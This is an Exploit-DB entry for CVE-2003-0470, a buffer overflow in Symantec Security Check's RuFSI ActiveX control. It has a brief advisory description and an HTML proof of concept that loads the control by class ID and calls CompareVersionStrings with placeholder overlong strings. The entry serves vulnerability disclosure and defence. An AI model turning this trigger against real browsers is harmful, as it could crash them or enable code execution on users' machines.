Symantec Security Check RuFSI ActiveX Control Buffer Overflow Vulnerability

2003-06-23T00:00:00
ID EDB-ID:22816
Type exploitdb
Reporter Cesar Cerrudo
Modified 2003-06-23T00:00:00

Description

Symantec Security Check RuFSI ActiveX Control Buffer Overflow Vulnerability. CVE-2003-0470. Dos exploit for windows platform

                                        
                                            source: http://www.securityfocus.com/bid/8008/info

It has been reported that the RuFSI Utility Class is vulnerable to a boundary condition error when invoked with long strings. This could potentially lead to the execution of code with the privileges of the user executing the web browser. 

<object classid="clsid:69DEAF94-AF66-11D3-BEC0-00105AA9B6AE" id="test">
</object>

<script>
test.CompareVersionStrings("long string here","or long string here")
</script>